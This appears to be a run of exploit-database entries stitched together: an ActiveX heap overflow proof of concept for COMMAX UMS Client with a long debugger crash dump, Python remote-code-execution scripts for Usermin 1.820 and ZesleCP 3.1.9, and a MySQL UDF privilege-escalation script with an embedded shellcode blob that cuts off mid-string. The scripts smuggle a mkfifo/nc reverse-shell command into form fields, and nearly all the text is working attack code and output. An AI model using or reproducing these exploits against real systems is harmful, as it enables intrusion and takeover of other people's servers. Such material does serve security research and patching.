# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 1.7.0.2 Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX DVR/NVR. Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a heap based buffer overflow when a user inserts overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node. Tested on: Microsoft Windows 10 Home (64bit) EN Microsoft Internet Explorer 20H2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5664 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php 02.08.2021 -- <!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() --> <!-- parameters: user_id, user_pwd and rtsp_addr --> <html> <object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' /> <script language='vbscript'> targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll" prototype = "Function rtsp_forceconnect_login ( ByVal user_id As String , ByVal user_pwd As String , ByVal rtsp_addr As String , ByVal rtsp_port As Long , ByVal rtp_proto As Long , ByVal device As Long , ByVal islive As Long , ByVal ch As Long ) As Long" memberName = "rtsp_forceconnect_login" progid = "CNC_CTRLLib.UMS_Ctrl" argCount = 8 arga=String(2510, "C") argb=String(2510, "B") argc=String(2510, "A") argd=1 arge=1 argf=1 argg=1 argh=1 cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh </script> </html> == (5b1c.59e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL - CNC_Ctrl!DllUnregisterServer+0x19e34: 10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? 0:000:x86> r eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001 eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 CNC_Ctrl!DllUnregisterServer+0x19e34: 10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=???????? 0:000:x86> !exchain 030feab4: 41414141 Invalid exception stack at 41414141 0:000:x86> d esp 030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0:000:x86> d ebp 030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 0:000:x86> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: CNC_Ctrl!DllUnregisterServer+18ee3 10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 000012d4 Attempt to write to address 000012d4 FAULTING_THREAD: 000056a4 DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE PROCESS_NAME: wscript.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 000012d4 FOLLOWUP_IP: CNC_Ctrl!DllUnregisterServer+18ee3 10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx WRITE_ADDRESS: 000012d4 WATSON_BKT_PROCSTAMP: 7159f3df WATSON_BKT_PROCVER: 5.812.10240.16384 PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host WATSON_BKT_MODULE: CNC_Ctrl.DLL WATSON_BKT_MODSTAMP: 547ed821 WATSON_BKT_MODOFFSET: 27da1 WATSON_BKT_MODVER: 1.7.0.2 MODULE_VER_PRODUCT: CNC_Ctrl Module BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n301] Type: [@ACCESS_VIOLATION] Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: [Unspecified] TID: [0x56a4] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n274] Type: [INVALID_POINTER_WRITE] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [0x56a4] Frame: [0] : CNC_Ctrl!DllUnregisterServer ID: [0n152] Type: [ZEROED_STACK] Class: Addendum Scope: BUCKET_ID Name: Add Data: Omit PID: [0x56e4] TID: [0x56a4] Frame: [0] : CNC_Ctrl!DllUnregisterServer BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT IP_ON_HEAP: 61616161 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 61616161 FRAME_ONE_INVALID: 1 LAST_CONTROL_TRANSFER: from 61616161 to 10027da1 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3 00afe298 61616161 61616161 61616161 61616161 0x61616161 00afe29c 61616161 61616161 61616161 61616161 0x61616161 00afe2a0 61616161 61616161 61616161 61616161 0x61616161 00afe2a4 61616161 61616161 61616161 61616161 0x61616161 00afe2a8 61616161 61616161 61616161 61616161 0x61616161 00afe2ac 61616161 61616161 61616161 61616161 0x61616161 00afe2b0 61616161 61616161 61616161 61616161 0x61616161 00afe2b4 61616161 61616161 61616161 61616161 0x61616161 00afe2b8 61616161 61616161 61616161 61616161 0x61616161 00afe2bc 61616161 61616161 61616161 61616161 0x61616161 00afe2c0 61616161 61616161 61616161 61616161 0x61616161 00afe2c4 61616161 61616161 61616161 61616161 0x61616161 00afe2c8 61616161 61616161 61616161 61616161 0x61616161 00afe2cc 61616161 61616161 61616161 61616161 0x61616161 00afe2d0 61616161 61616161 61616161 61616161 0x61616161 00afe2d4 61616161 61616161 61616161 61616161 0x61616161 00afe2d8 61616161 61616161 61616161 61616161 0x61616161 00afe2dc 61616161 61616161 61616161 61616161 0x61616161 00afe2e0 61616161 61616161 61616161 61616161 0x61616161 00afe2e4 61616161 61616161 61616161 61616161 0x61616161 00afe2e8 61616161 61616161 61616161 61616161 0x61616161 00afe2ec 61616161 61616161 61616161 61616161 0x61616161 00afe2f0 61616161 61616161 61616161 61616161 0x61616161 00afe2f4 61616161 61616161 61616161 61616161 0x61616161 00afe2f8 61616161 61616161 61616161 61616161 0x61616161 00afe2fc 61616161 61616161 61616161 61616161 0x61616161 00afe300 61616161 61616161 61616161 61616161 0x61616161 00afe304 61616161 61616161 61616161 61616161 0x61616161 00afe308 61616161 61616161 61616161 61616161 0x61616161 00afe30c 61616161 61616161 61616161 61616161 0x61616161 00afe310 61616161 61616161 61616161 61616161 0x61616161 00afe314 61616161 61616161 61616161 61616161 0x61616161 00afe318 61616161 61616161 61616161 41414141 0x61616161 00afe31c 61616161 61616161 41414141 41414141 0x61616161 00afe320 61616161 41414141 41414141 41414141 0x61616161 00afe324 41414141 41414141 41414141 41414141 0x61616161 00afe328 41414141 41414141 41414141 41414141 0x41414141 00afe32c 41414141 41414141 41414141 41414141 0x41414141 00afe330 41414141 41414141 41414141 41414141 0x41414141 00afe334 41414141 41414141 41414141 41414141 0x41414141 00afe338 41414141 41414141 41414141 41414141 0x41414141 00afe33c 41414141 41414141 41414141 41414141 0x41414141 00afe340 41414141 41414141 41414141 41414141 0x41414141 00afe344 41414141 41414141 41414141 41414141 0x41414141 00afe348 41414141 41414141 41414141 41414141 0x41414141 00afe34c 41414141 41414141 41414141 41414141 0x41414141 00afe350 41414141 41414141 41414141 41414141 0x41414141 00afe354 41414141 41414141 41414141 41414141 0x41414141 00afe358 41414141 41414141 41414141 41414141 0x41414141 00afe35c 41414141 41414141 41414141 41414141 0x41414141 00afe360 41414141 41414141 41414141 41414141 0x41414141 00afe364 41414141 41414141 41414141 41414141 0x41414141 00afe368 41414141 41414141 41414141 41414141 0x41414141 00afe36c 41414141 41414141 41414141 41414141 0x41414141 00afe370 41414141 41414141 41414141 41414141 0x41414141 00afe374 41414141 41414141 41414141 41414141 0x41414141 00afe378 41414141 41414141 41414141 41414141 0x41414141 00afe37c 41414141 41414141 41414141 41414141 0x41414141 00afe380 41414141 41414141 41414141 41414141 0x41414141 00afe384 41414141 41414141 41414141 41414141 0x41414141 00afe388 41414141 41414141 41414141 41414141 0x41414141 00afe38c 41414141 41414141 41414141 41414141 0x41414141 00afe390 41414141 41414141 41414141 41414141 0x41414141 00afe394 41414141 41414141 41414141 41414141 0x41414141 00afe398 41414141 41414141 41414141 41414141 0x41414141 00afe39c 41414141 41414141 41414141 41414141 0x41414141 00afe3a0 41414141 41414141 41414141 41414141 0x41414141 00afe3a4 41414141 41414141 41414141 41414141 0x41414141 00afe3a8 41414141 41414141 41414141 41414141 0x41414141 00afe3ac 41414141 41414141 41414141 41414141 0x41414141 00afe3b0 41414141 41414141 41414141 41414141 0x41414141 00afe3b4 41414141 41414141 41414141 41414141 0x41414141 00afe3b8 41414141 41414141 41414141 41414141 0x41414141 00afe3bc 41414141 41414141 41414141 41414141 0x41414141 00afe3c0 41414141 41414141 41414141 41414141 0x41414141 00afe3c4 41414141 41414141 41414141 41414141 0x41414141 00afe3c8 41414141 41414141 41414141 41414141 0x41414141 00afe3cc 41414141 41414141 41414141 41414141 0x41414141 00afe3d0 41414141 41414141 41414141 41414141 0x41414141 00afe3d4 41414141 41414141 41414141 41414141 0x41414141 00afe3d8 41414141 41414141 41414141 41414141 0x41414141 00afe3dc 41414141 41414141 41414141 41414141 0x41414141 00afe3e0 41414141 41414141 41414141 41414141 0x41414141 00afe3e4 41414141 41414141 41414141 41414141 0x41414141 00afe3e8 41414141 41414141 41414141 41414141 0x41414141 00afe3ec 41414141 41414141 41414141 41414141 0x41414141 00afe3f0 41414141 41414141 41414141 41414141 0x41414141 00afe3f4 41414141 41414141 41414141 41414141 0x41414141 00afe3f8 41414141 41414141 41414141 41414141 0x41414141 00afe3fc 41414141 41414141 41414141 41414141 0x41414141 00afe400 41414141 41414141 41414141 41414141 0x41414141 00afe404 41414141 41414141 41414141 41414141 0x41414141 00afe408 41414141 41414141 41414141 41414141 0x41414141 00afe40c 41414141 41414141 41414141 41414141 0x41414141 00afe410 41414141 41414141 41414141 41414141 0x41414141 00afe414 41414141 41414141 41414141 41414141 0x41414141 00afe418 41414141 41414141 41414141 41414141 0x41414141 00afe41c 41414141 41414141 41414141 41414141 0x41414141 00afe420 41414141 41414141 41414141 41414141 0x41414141 00afe424 41414141 41414141 41414141 41414141 0x41414141 00afe428 41414141 41414141 41414141 41414141 0x41414141 00afe42c 41414141 41414141 41414141 41414141 0x41414141 00afe430 41414141 41414141 41414141 41414141 0x41414141 00afe434 41414141 41414141 41414141 41414141 0x41414141 00afe438 41414141 41414141 41414141 41414141 0x41414141 00afe43c 41414141 41414141 41414141 41414141 0x41414141 00afe440 41414141 41414141 41414141 41414141 0x41414141 00afe444 41414141 41414141 41414141 41414141 0x41414141 00afe448 41414141 41414141 41414141 41414141 0x41414141 00afe44c 41414141 41414141 41414141 41414141 0x41414141 00afe450 41414141 41414141 41414141 41414141 0x41414141 00afe454 41414141 41414141 41414141 41414141 0x41414141 00afe458 41414141 41414141 41414141 41414141 0x41414141 00afe45c 41414141 41414141 41414141 41414141 0x41414141 00afe460 41414141 41414141 41414141 41414141 0x41414141 00afe464 41414141 41414141 41414141 41414141 0x41414141 00afe468 41414141 41414141 41414141 41414141 0x41414141 00afe46c 41414141 41414141 41414141 41414141 0x41414141 00afe470 41414141 41414141 41414141 41414141 0x41414141 00afe474 41414141 41414141 41414141 41414141 0x41414141 00afe478 41414141 41414141 41414141 41414141 0x41414141 00afe47c 41414141 41414141 41414141 41414141 0x41414141 00afe480 41414141 41414141 41414141 41414141 0x41414141 00afe484 41414141 41414141 41414141 41414141 0x41414141 00afe488 41414141 41414141 41414141 41414141 0x41414141 00afe48c 41414141 41414141 41414141 41414141 0x41414141 00afe490 41414141 41414141 41414141 41414141 0x41414141 00afe494 41414141 41414141 41414141 41414141 0x41414141 00afe498 41414141 41414141 41414141 41414141 0x41414141 00afe49c 41414141 41414141 41414141 41414141 0x41414141 00afe4a0 41414141 41414141 41414141 41414141 0x41414141 00afe4a4 41414141 41414141 41414141 41414141 0x41414141 00afe4a8 41414141 41414141 41414141 41414141 0x41414141 00afe4ac 41414141 41414141 41414141 41414141 0x41414141 00afe4b0 41414141 41414141 41414141 41414141 0x41414141 00afe4b4 41414141 41414141 41414141 41414141 0x41414141 00afe4b8 41414141 41414141 41414141 41414141 0x41414141 00afe4bc 41414141 41414141 41414141 41414141 0x41414141 00afe4c0 41414141 41414141 41414141 41414141 0x41414141 00afe4c4 41414141 41414141 41414141 41414141 0x41414141 00afe4c8 41414141 41414141 41414141 41414141 0x41414141 00afe4cc 41414141 41414141 41414141 41414141 0x41414141 00afe4d0 41414141 41414141 41414141 41414141 0x41414141 00afe4d4 41414141 41414141 41414141 41414141 0x41414141 00afe4d8 41414141 41414141 41414141 41414141 0x41414141 00afe4dc 41414141 41414141 41414141 41414141 0x41414141 00afe4e0 41414141 41414141 41414141 41414141 0x41414141 00afe4e4 41414141 41414141 41414141 41414141 0x41414141 00afe4e8 41414141 41414141 41414141 41414141 0x41414141 00afe4ec 41414141 41414141 41414141 41414141 0x41414141 00afe4f0 41414141 41414141 41414141 41414141 0x41414141 00afe4f4 41414141 41414141 41414141 41414141 0x41414141 00afe4f8 41414141 41414141 41414141 41414141 0x41414141 00afe4fc 41414141 41414141 41414141 41414141 0x41414141 00afe500 41414141 41414141 41414141 41414141 0x41414141 00afe504 41414141 41414141 41414141 41414141 0x41414141 00afe508 41414141 41414141 41414141 41414141 0x41414141 00afe50c 41414141 41414141 41414141 41414141 0x41414141 00afe510 41414141 41414141 41414141 41414141 0x41414141 00afe514 41414141 41414141 41414141 41414141 0x41414141 00afe518 41414141 41414141 41414141 41414141 0x41414141 00afe51c 41414141 41414141 41414141 41414141 0x41414141 00afe520 41414141 41414141 41414141 41414141 0x41414141 00afe524 41414141 41414141 41414141 41414141 0x41414141 00afe528 41414141 41414141 41414141 41414141 0x41414141 00afe52c 41414141 41414141 41414141 41414141 0x41414141 00afe530 41414141 41414141 41414141 41414141 0x41414141 00afe534 41414141 41414141 41414141 41414141 0x41414141 00afe538 41414141 41414141 41414141 41414141 0x41414141 00afe53c 41414141 41414141 41414141 41414141 0x41414141 00afe540 41414141 41414141 41414141 41414141 0x41414141 00afe544 41414141 41414141 41414141 41414141 0x41414141 00afe548 41414141 41414141 41414141 41414141 0x41414141 00afe54c 41414141 41414141 41414141 41414141 0x41414141 00afe550 41414141 41414141 41414141 41414141 0x41414141 00afe554 41414141 41414141 41414141 41414141 0x41414141 00afe558 41414141 41414141 41414141 41414141 0x41414141 00afe55c 41414141 41414141 41414141 41414141 0x41414141 00afe560 41414141 41414141 41414141 41414141 0x41414141 00afe564 41414141 41414141 41414141 41414141 0x41414141 00afe568 41414141 41414141 41414141 41414141 0x41414141 00afe56c 41414141 41414141 41414141 41414141 0x41414141 00afe570 41414141 41414141 41414141 41414141 0x41414141 00afe574 41414141 41414141 41414141 41414141 0x41414141 00afe578 41414141 41414141 41414141 41414141 0x41414141 00afe57c 41414141 41414141 41414141 41414141 0x41414141 00afe580 41414141 41414141 41414141 41414141 0x41414141 00afe584 41414141 41414141 41414141 41414141 0x41414141 00afe588 41414141 41414141 41414141 41414141 0x41414141 00afe58c 41414141 41414141 41414141 41414141 0x41414141 00afe590 41414141 41414141 41414141 41414141 0x41414141 00afe594 41414141 41414141 41414141 41414141 0x41414141 00afe598 41414141 41414141 41414141 41414141 0x41414141 00afe59c 41414141 41414141 41414141 41414141 0x41414141 00afe5a0 41414141 41414141 41414141 41414141 0x41414141 00afe5a4 41414141 41414141 41414141 41414141 0x41414141 00afe5a8 41414141 41414141 41414141 41414141 0x41414141 00afe5ac 41414141 41414141 41414141 41414141 0x41414141 00afe5b0 41414141 41414141 41414141 41414141 0x41414141 00afe5b4 41414141 41414141 41414141 41414141 0x41414141 00afe5b8 41414141 41414141 41414141 41414141 0x41414141 00afe5bc 41414141 41414141 41414141 41414141 0x41414141 00afe5c0 41414141 41414141 41414141 41414141 0x41414141 00afe5c4 41414141 41414141 41414141 41414141 0x41414141 00afe5c8 41414141 41414141 41414141 41414141 0x41414141 00afe5cc 41414141 41414141 41414141 41414141 0x41414141 00afe5d0 41414141 41414141 41414141 41414141 0x41414141 00afe5d4 41414141 41414141 41414141 41414141 0x41414141 00afe5d8 41414141 41414141 41414141 41414141 0x41414141 00afe5dc 41414141 41414141 41414141 41414141 0x41414141 00afe5e0 41414141 41414141 41414141 41414141 0x41414141 00afe5e4 41414141 41414141 41414141 41414141 0x41414141 00afe5e8 41414141 41414141 41414141 41414141 0x41414141 00afe5ec 41414141 41414141 41414141 41414141 0x41414141 00afe5f0 41414141 41414141 41414141 41414141 0x41414141 00afe5f4 41414141 41414141 41414141 41414141 0x41414141 STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2 THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1 FAULT_INSTR_CODE: 12d49989 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3 FOLLOWUP_NAME: MachineOwner MODULE_NAME: CNC_Ctrl IMAGE_NAME: CNC_Ctrl.DLL DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821 FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3 FAILURE_EXCEPTION_CODE: c0000005 FAILURE_IMAGE_NAME: CNC_Ctrl.DLL BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL FAILURE_MODULE_NAME: CNC_Ctrl BUCKET_ID_MODULE_STR: CNC_Ctrl FAILURE_FUNCTION_NAME: DllUnregisterServer BUCKET_ID_FUNCTION_STR: DllUnregisterServer BUCKET_ID_OFFSET: 18ee3 BUCKET_ID_MODTIMEDATESTAMP: 547ed821 BUCKET_ID_MODCHECKSUM: 357a4b BUCKET_ID_MODVER_STR: 1.7.0.2 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1 TARGET_TIME: 2021-08-12T11:37:22.000Z OSBUILD: 19042 OSSERVICEPACK: 1023 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: unknown_date BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.1023 ANALYSIS_SESSION_ELAPSED_TIME: 68b2 ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b} Followup: MachineOwner ---------

# Title: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated) # Date: 27.08.2021 # Author: Numan Türle # Vendor Homepage: https://www.webmin.com/usermin.html # Software Link: https://github.com/webmin/usermin # Version: <=1820 # https://www.youtube.com/watch?v=wiRIWFAhz24 #!/usr/bin/python3 # -*- coding: utf-8 -*- # Usermin - Remote Code Execution (Authenticated) ( Version 1.820 ) # author: twitter.com/numanturle # usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD # https://youtu.be/wiRIWFAhz24 import argparse,requests,warnings,json,re from requests.packages.urllib3.exceptions import InsecureRequestWarning from cmd import Cmd warnings.simplefilter('ignore',InsecureRequestWarning) def init(): parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )') parser.add_argument('-u','--host',help='Host', type=str, required=True) parser.add_argument('-l', '--login',help='Username', type=str, required=True) parser.add_argument('-p', '--password',help='Password', type=str, required=True) args = parser.parse_args() exploit(args) def exploit(args): listen_ip = "0.0.0.0" listen_port = 1337 session = requests.Session() target = "https://{}:20000".format(args.host) username = args.login password = args.password print("[+] Target {}".format(target)) headers = { 'Cookie': 'redirect=1; testing=1;', 'Referer': target } login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password}) login_content = str(login.content) search = "webmin_search.cgi" check_login_string = re.findall(search,login_content) if check_login_string: session_hand_login = session.cookies.get_dict() print("[+] Login successfully") print("[+] Setup GnuPG") payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port) #payload = "whoami;" post_data = { "name":'";{}echo "'.format(payload), "email":"[email protected]", } print("[+] Payload {}".format(post_data)) session.headers.update({'referer': target}) create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data) create_secret_content = str(create_secret.content) search = "successfully" check_exp = re.findall(search,create_secret_content) if check_exp: print("[+] Setup successful") print("[+] Fetching key list") session.headers.update({'referer': target}) key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False) last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2] print("[+] Key : {}".format(last_gets_key)) session.headers.update({'referer': target}) try: key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3) except requests.exceptions.ReadTimeout: pass print("[+] 5ucc355fully_3xpl017") else: print("[-] an unexpected error occurred" ) else: print("[-] AUTH : Login failed.") if __name__ == "__main__": init()

# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 27.08.2021 # Author: Numan Türle # Vendor Homepage: https://zeslecp.com/ # Software Link: https://zeslecp.com/ # Version: <=3.1.9 # https://www.youtube.com/watch?v=5lTDTEBVq-0 #!/usr/bin/python3 # -*- coding: utf-8 -*- # ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 ) # author: twitter.com/numanturle # usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD # https://www.youtube.com/watch?v=5lTDTEBVq-0 import argparse,requests,warnings,json,random,string from requests.packages.urllib3.exceptions import InsecureRequestWarning from cmd import Cmd warnings.simplefilter('ignore',InsecureRequestWarning) def init(): parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )') parser.add_argument('-u','--host',help='Host', type=str, required=True) parser.add_argument('-l', '--login',help='Username', type=str, required=True) parser.add_argument('-p', '--password',help='Password', type=str, required=True) args = parser.parse_args() exploit(args) def exploit(args): listen_ip = "0.0.0.0" listen_port = 1337 session = requests.Session() target = "https://{}:2087".format(args.host) username = args.login password = args.password print("[+] Target {}".format(target)) login = session.post(target+"/login", verify=False, json={"username":username,"password":password}) login_json = json.loads(login.content) if login_json["success"]: session_hand_login = session.cookies.get_dict() print("[+] Login successfully") print("[+] Creating ftp account") ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10)) print("[+] Username : {}".format(ftp_username)) print("[+] Send payload....") payload = { "ftp_user": ftp_username, "ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port) } try: feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3) except requests.exceptions.ReadTimeout: pass print("[+] Successful") else: print("[-] AUTH : Login failed msg: {}".format(login_json["message"])) if __name__ == "__main__": init()

# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) # Date: 29/08/2021 # Exploit Author: ninpwn # Vendor Homepage: https://www.mysql.com # Software Link: www.mysql.com # Version: MySQL 4.x/5.x # Tested on: Debian GNU/Linux 9 / mysql Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using EditLine wrapper # CVE : N/A ''' *** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function Local Privilege Escalation Exploit - Python 3 Version *** UDF lib shellcodes retrieved from metasploit (there are windows .dll libraries within metasploit as well so this could be easily ported to Windows) Based on the Python 2 exploit by D7X (EDB ID: 46249) and the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518) CVE: N/A References: https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html https://www.exploit-db.com/exploits/1518 https://www.exploit-db.com/exploits/46249 https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith) Tested on Linux 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux @ninpwn https://twitter.com/ninpwn ''' #!/usr/bin/python3 import sys import subprocess import platform, random import argparse import os import re import pty shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e704